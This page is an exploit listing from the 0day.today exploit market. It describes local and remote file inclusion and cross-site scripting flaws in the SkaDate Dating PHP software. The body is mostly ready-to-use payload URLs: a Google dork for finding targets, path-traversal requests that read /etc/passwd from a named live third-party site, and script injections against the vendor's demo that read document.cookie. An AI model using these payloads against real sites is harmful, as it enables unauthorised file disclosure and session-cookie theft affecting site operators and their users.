[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities

Author
Moudi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5548
Category
web applications
Date add
26-07-2009
Platform
unsorted
============================================================
SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities
============================================================


==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ SkaDate Dating ]
	[»] Language:           [ PHP ]
        [»] Download:           [ https://www.skadate.com/  ]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Powered by SkaDate dating ]
        [»] Price:              [ $350 ]

###########################################################################

===[ Exploit + LIVE : RFI/LFI vulnerability ]===	
	
[»] http://www.site.com/patch/?layout=[LFI]
[»] http://www.site.com/patch/?language_id=[LFI]

[»] http://www.site.com/patch/?language_id=[RFI]

[»] http://www.rsvpsinglelife.com/?layout=../../../../../../../../etc/passwd
[»] http://www.rsvpsinglelife.com/?language_id=../../../../../../../../etc/passwd

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/admin/auth.php/[XSS]
[»] http://www.site.com/patch/file_uploader.php/[XSS]

[»] http://www.skadate.com/demo/admin/auth.php/"><script>alert(document.cookie);</script>
[»] http://www.skadate.com/demo/file_uploader.php/"><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################




#  0day.today [2024-11-15]  #